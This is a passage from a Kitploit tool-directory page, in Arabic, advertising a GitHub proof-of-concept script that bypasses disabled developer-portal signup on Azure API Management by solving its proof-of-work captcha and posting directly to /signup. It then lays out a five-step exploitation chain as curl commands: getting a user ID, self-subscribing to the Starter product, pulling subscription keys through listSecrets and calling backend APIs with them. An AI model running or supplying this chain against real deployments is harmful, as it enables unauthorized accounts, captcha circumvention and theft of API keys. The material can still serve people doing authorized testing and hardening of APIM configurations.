Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Azure-APIM-Dev-Portal-Signup-Bypass — سكربت Python لتجاوز التسجيل في Azure APIM عندما تكون الواجهة معطلة، وهذا يختلف عن CVE-2025-66390 لأنه لا يتطلب إعداد أي شيء عبر المستأجرين. | Kitploit
أدوات/GitHubGitHub/dz-y/azure-apim-dev-portal-signup-bypass
المصادقة والترخيصأمن البنية التحتية السحابيةاستغلال تطبيقات الويباختبار أمان APIاختبار الاختراقأمن السحابةسوء التكوينأمن واجهات برمجة التطبيقاتتجاوز كابتشا

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubdz-y/azure-apim-dev-portal-signup-bypass

Azure-APIM-Dev-Portal-Signup-Bypass

سكربت Python لتجاوز التسجيل في Azure APIM عندما تكون الواجهة معطلة، وهذا يختلف عن CVE-2025-66390 لأنه لا يتطلب إعداد أي شيء عبر المستأجرين.

عرض المستودع
منذ 15 أياملم تتم المراجعة بعد

نص برمجي لإثبات المفهوم (PoC) لتجاوز تعطيل تسجيل بوابة المطوّرين على Azure APIM عن طريق استدعاء واجهة التسجيل الخلفية مباشرةً.

ماذا يفعل؟

يمكن ضبط بوابات مطوّري Azure APIM لتعطيل التسجيل الذاتي عبر واجهة البوابة. في بعض النشرات، تبقى نقطة نهاية الواجهة الأساسية (/signup) نشطة ويمكن الوصول إليها حتى عندما يكون زر الواجهة مخفياً أو مُزالاً. يستغل هذا البرنامج النصي تلك الفجوة عبر:

  1. جلب تحدي الكابتشا الخاص بإثبات العمل (PoW) من /v2/captcha-challenge
  2. حل PoW الخاص بـ SHA-256 بالقوة الغاشمة من جهة العميل
  3. إرسال طلب تسجيل مباشرةً إلى /signup مع التحدي المُحل وبيانات الحساب

تُطلب جميع المدخلات (رابط الهدف، بيانات الاعتماد، البروكسي) بشكل تفاعلي في وقت التشغيل.

العلاقة بـ CVE-2025-66390

يصف CVE-2025-66390 (درجة خطورة CVSS 9.8 حرجة) تجاوزاً عبر المستأجرين في تسجيل APIM: حيث يستغل المهاجم مستأجراً يكون فيه التسجيل مفعّلاً لتسجيل حسابات في مستأجر مختلف يكون فيه التسجيل معطّلاً، عبر التلاعب بترويسة Host في طلبات الواجهة. وقد اعتبرته Microsoft مشكلة إعداد وليس ثغرة في المنتج.

لا يتطلب هذا الأمر إنشاء أي مستأجر عبر؛ بدلاً من ذلك يستخدم فقط نقطة النهاية /v2/captcha-challenge لحل الكابتشا خلال 75000 تكرار (في المتوسط).

الاستخدام

root@kitploit:~
python3 apim_signup.py

يطلب إدخال رابط الهدف، وبيانات الحساب، وكلمة المرور (إدخال مخفي مع عرضها للتأكيد)، والبروكسي الاختياري.

سلسلة الاستغلال بعد التسجيل

بمجرد نجاح طلب التسجيل ووصول بريد التأكيد، تكون سلسلة الهجوم الكاملة كالتالي:

الخطوة 1 — تأكيد البريد الإلكتروني

انقر رابط التأكيد في بريد التسجيل. هذا يفعّل الحساب قبل أن تقوم واجهة الإدارة بمصادقته.

الخطوة 2 — المصادقة والحصول على معرف المستخدم

استدعِ واجهة إدارة APIM باستخدام مصادقة Basic (base64(email:password)) للحصول على معرف المستخدم الداخلي الخاص بك:

root@kitploit:~
curl -s "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/identity?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>"
# → {"id":"<user-id>"}

يُستخدم حقل id المُعاد في جميع استدعاءات واجهة الإدارة اللاحقة.

أو استخدم /developer/identity?api-version=2022-04-01-preview <-- الإصدار لا يهم ستظهر واجهة مستخدم تطالب بتسجيل الدخول، ومن هناك يمكنك الحصول على معرفك أيضاً.

صورة

الخطوة 3 — الاشتراك الذاتي في منتج

يأتي المنتج الافتراضي Starter مع approvalRequired: false، ما يعني عدم الحاجة إلى موافقة المسؤول. اشترك ذاتياً عبر PUT:

root@kitploit:~
curl -s -X PUT "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/users/<user-id>/subscriptions/starter-sub?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>" \
  -H "Content-Type: application/json" \
  -d '{"properties":{"scope":"/products/starter","displayName":"Starter"}}'
# → HTTP 201 Created

يصل بريد تأكيد ("اشتراكك في Starter") من [email protected].

الخطوة 4 — استرداد مفاتيح الاشتراك

root@kitploit:~
curl -s -X POST "https://<service>.management.azure-api.net/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ApiManagement/service/<service>/users/<user-id>/subscriptions/starter-sub/listSecrets?api-version=2019-12-01" \
  -H "Authorization: Basic <base64(email:password)>"
# → {"primaryKey":"...","secondaryKey":"..."}

الخطوة 5 — استدعاء واجهات الواجهة الخلفية

استخدم المفتاح الأساسي كقيمة Ocp-Apim-Subscription-Key مع بوابة APIM لإجراء استدعاءات خلفية مصادق عليها:

root@kitploit:~
curl -s "https://<service>.azure-api.net/<api-path>" \
  -H "Ocp-Apim-Subscription-Key: <primaryKey>"

يتم تحديد الوصول بناءً على واجهات API المقيّدة بمنتج Starter — وفي النشر الذي يحتوي على إعدادات خاطئة يمكن أن يكشف هذا عن الواجهات الخلفية الداخلية دون مصادقة إضافية.


لمزيد من التفاصيل، هذا المقال جيد جداً في وصف السلسلة؛ فقط استبعد جزء cross tenant. https://www.praetorian.com/blog/azure-apim-signup-bypass/

تنزيل الأداة